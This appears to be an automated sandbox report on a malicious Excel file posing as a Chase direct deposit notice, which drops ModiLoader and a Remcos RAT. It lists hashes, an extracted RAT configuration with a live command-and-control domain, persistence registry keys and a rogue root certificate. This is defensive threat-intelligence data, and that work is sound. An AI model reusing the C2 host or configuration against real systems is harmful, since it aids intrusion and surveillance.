modiloader | 4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829

Analysis

max time kernel
1147s
max time network
1010s
platform
windows7_x64
resource
win7v20210408
submitted
25-08-2021 16:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chase Direct Deposit.xls
Size

116KB
MD5

89da2874a518638c7f5ec30a286f4167
SHA1

c766aba3be2f450a8059b4754fed706730321f4d
SHA256

4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829
SHA512

390e3e89026436fff0fa646cc111df980cc5f5ef29b4c3ee1f857de426e643d10bf77f469424ab17a500dd8b575d62af5dea34d42c36a6ab905674c04797c21d

Score

10^/10

modiloader remcos augusta persistence rat trojan

Malware Config

Extracted

Family

remcos

Version

3.2.0 Pro

Botnet

Augusta

twistednerd.dvrlists.com:8618

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%AppData%
mouse_option
false
mutex
Augusta-LF4SC3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
notepad;solitaire;

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1308	1880	powershell.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2396	1880	powershell.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2100	1880	powershell.exe	EXCEL.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1308 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

bill.exebill.exebill.exebill.exebill.exebill.exe

pid process

1792 bill.exe
740 bill.exe
2704 bill.exe
2772 bill.exe
2464 bill.exe
2556 bill.exe

flow	pid	process
6	1308	powershell.exe

pid	process
1792	bill.exe
740	bill.exe
2704	bill.exe
2772	bill.exe
2464	bill.exe
2556	bill.exe

Loads dropped DLL 9 IoCs

Processes:

powershell.exebill.exepowershell.exebill.exepowershell.exebill.exe

pid	process
1308	powershell.exe
1308	powershell.exe
1792	bill.exe
2396	powershell.exe
2396	powershell.exe
2704	bill.exe
2100	powershell.exe
2100	powershell.exe
2464	bill.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

bill.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zgwpegs = "C:\\Users\\Public\\Libraries\\sgepwgZ.url"	bill.exe

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0\HELPDIR	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0\FLAGS\ = "6"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0\FLAGS	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\TypeLib\{132B9108-FE23-464D-B0EB-6323C46D784F}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

2656 reg.exe
2668 reg.exe
1720 reg.exe

pid	process
2656	reg.exe
2668	reg.exe
1720	reg.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

bill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F2086A324CCC3A087FC1912F4B435BBF5E016580	bill.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F2086A324CCC3A087FC1912F4B435BBF5E016580\Blob = 0f0000000100000020000000e2e9b368524ccdd4c84039c3b76b99167dddd98eff66b64026f5570539151883030000000100000014000000f2086a324ccc3a087fc1912f4b435bbf5e0165802000000001000000f9020000308202f5308201dda00302010202102195dcb2dd4f4506770854509d06952a300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303831333134303030305a170d3236303831323134303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100fa2208c41f2039986750d88f5a278315d813711e9c87d5811cc0506c1a9c6b1ee2e644ce939e550aeea43d5bdb541c6e065edcc756d437c71cf6abb4e8d1bd9eafbcee70202b18fed2ce635e244278cfc50bea32d9bf9d6d7ef7b4e419ebceaf3422882933b48c0f7ec4449980049e1c16ac27087fb540457a9845840b1ce5422d7cb4f3f29f132f5f40ec7d3eb6eb02a570d43f21087197deb2e36f61c092cd584b658bc4f240457d99efe782ad1a2139be40d4d3e93cd55bb4d7797570ed8ff6867813774ff9feeb91454c15714f5e595638164fda89c61c9ab7353a5b351eba8d025c7b90d3215007dcef5236ff53ca5eeb90cfe3eaf390f06e47a6f49d650203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604142667992672acabc18b83ec0bcff39cb8cf376f5a300d06092a864886f70d01010b050003820101006b57704687e490440eddaa7765c6c173f3984a1330feef4275b2c0f8b0fd6c86dfcf8f31815ebbb1228375d4703807fbd4c41e0457ed686e74648ccdd58a01641e3006f644765d360661e1c27e9743335d89b06ae13f1bf23ef53fe9e823118b2f70da1547920c9810463c71c72dea3df43ee3fc9a5a1cd427642bc8dbd632591f6ce538f93c19165e455018379829b666906a3d2557f31469138d661343f4c551098597b548abaafb46e41e83422cf524978dab3db741e726c435931765f8fc61bfa7a07e945c259e34ce3cf2de7caa861f62496072169b550462bce553afcfc5e8e8bfe204c82f405dae2560e1b728b8bb5d893635225466f6d99264338b1f	bill.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F2086A324CCC3A087FC1912F4B435BBF5E016580\Blob = 1400000001000000140000002667992672acabc18b83ec0bcff39cb8cf376f5a030000000100000014000000f2086a324ccc3a087fc1912f4b435bbf5e0165800f0000000100000020000000e2e9b368524ccdd4c84039c3b76b99167dddd98eff66b64026f55705391518832000000001000000f9020000308202f5308201dda00302010202102195dcb2dd4f4506770854509d06952a300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303831333134303030305a170d3236303831323134303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100fa2208c41f2039986750d88f5a278315d813711e9c87d5811cc0506c1a9c6b1ee2e644ce939e550aeea43d5bdb541c6e065edcc756d437c71cf6abb4e8d1bd9eafbcee70202b18fed2ce635e244278cfc50bea32d9bf9d6d7ef7b4e419ebceaf3422882933b48c0f7ec4449980049e1c16ac27087fb540457a9845840b1ce5422d7cb4f3f29f132f5f40ec7d3eb6eb02a570d43f21087197deb2e36f61c092cd584b658bc4f240457d99efe782ad1a2139be40d4d3e93cd55bb4d7797570ed8ff6867813774ff9feeb91454c15714f5e595638164fda89c61c9ab7353a5b351eba8d025c7b90d3215007dcef5236ff53ca5eeb90cfe3eaf390f06e47a6f49d650203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604142667992672acabc18b83ec0bcff39cb8cf376f5a300d06092a864886f70d01010b050003820101006b57704687e490440eddaa7765c6c173f3984a1330feef4275b2c0f8b0fd6c86dfcf8f31815ebbb1228375d4703807fbd4c41e0457ed686e74648ccdd58a01641e3006f644765d360661e1c27e9743335d89b06ae13f1bf23ef53fe9e823118b2f70da1547920c9810463c71c72dea3df43ee3fc9a5a1cd427642bc8dbd632591f6ce538f93c19165e455018379829b666906a3d2557f31469138d661343f4c551098597b548abaafb46e41e83422cf524978dab3db741e726c435931765f8fc61bfa7a07e945c259e34ce3cf2de7caa861f62496072169b550462bce553afcfc5e8e8bfe204c82f405dae2560e1b728b8bb5d893635225466f6d99264338b1f	bill.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F2086A324CCC3A087FC1912F4B435BBF5E016580\Blob = 190000000100000010000000c9727547624086b6297ec4d1c7da79eb0f0000000100000020000000e2e9b368524ccdd4c84039c3b76b99167dddd98eff66b64026f5570539151883030000000100000014000000f2086a324ccc3a087fc1912f4b435bbf5e0165801400000001000000140000002667992672acabc18b83ec0bcff39cb8cf376f5a2000000001000000f9020000308202f5308201dda00302010202102195dcb2dd4f4506770854509d06952a300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303831333134303030305a170d3236303831323134303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100fa2208c41f2039986750d88f5a278315d813711e9c87d5811cc0506c1a9c6b1ee2e644ce939e550aeea43d5bdb541c6e065edcc756d437c71cf6abb4e8d1bd9eafbcee70202b18fed2ce635e244278cfc50bea32d9bf9d6d7ef7b4e419ebceaf3422882933b48c0f7ec4449980049e1c16ac27087fb540457a9845840b1ce5422d7cb4f3f29f132f5f40ec7d3eb6eb02a570d43f21087197deb2e36f61c092cd584b658bc4f240457d99efe782ad1a2139be40d4d3e93cd55bb4d7797570ed8ff6867813774ff9feeb91454c15714f5e595638164fda89c61c9ab7353a5b351eba8d025c7b90d3215007dcef5236ff53ca5eeb90cfe3eaf390f06e47a6f49d650203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604142667992672acabc18b83ec0bcff39cb8cf376f5a300d06092a864886f70d01010b050003820101006b57704687e490440eddaa7765c6c173f3984a1330feef4275b2c0f8b0fd6c86dfcf8f31815ebbb1228375d4703807fbd4c41e0457ed686e74648ccdd58a01641e3006f644765d360661e1c27e9743335d89b06ae13f1bf23ef53fe9e823118b2f70da1547920c9810463c71c72dea3df43ee3fc9a5a1cd427642bc8dbd632591f6ce538f93c19165e455018379829b666906a3d2557f31469138d661343f4c551098597b548abaafb46e41e83422cf524978dab3db741e726c435931765f8fc61bfa7a07e945c259e34ce3cf2de7caa861f62496072169b550462bce553afcfc5e8e8bfe204c82f405dae2560e1b728b8bb5d893635225466f6d99264338b1f	bill.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1880 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1308 powershell.exe
1308 powershell.exe
2396 powershell.exe
2396 powershell.exe
2100 powershell.exe
2100 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

EXCEL.EXE

pid process

1880 EXCEL.EXE

pid	process
1880	EXCEL.EXE

pid	process
1880	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeEXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeShutdownPrivilege	1880	EXCEL.EXE

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

EXCEL.EXE

pid process

1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE
1880 EXCEL.EXE

pid	process
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE
1880	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEpowershell.exebill.exe

description	pid	process	target process
PID 1880 wrote to memory of 1308	1880	EXCEL.EXE	powershell.exe
PID 1880 wrote to memory of 1308	1880	EXCEL.EXE	powershell.exe
PID 1880 wrote to memory of 1308	1880	EXCEL.EXE	powershell.exe
PID 1880 wrote to memory of 1308	1880	EXCEL.EXE	powershell.exe
PID 1308 wrote to memory of 1792	1308	powershell.exe	bill.exe
PID 1308 wrote to memory of 1792	1308	powershell.exe	bill.exe
PID 1308 wrote to memory of 1792	1308	powershell.exe	bill.exe
PID 1308 wrote to memory of 1792	1308	powershell.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
PID 1792 wrote to memory of 740	1792	bill.exe	bill.exe
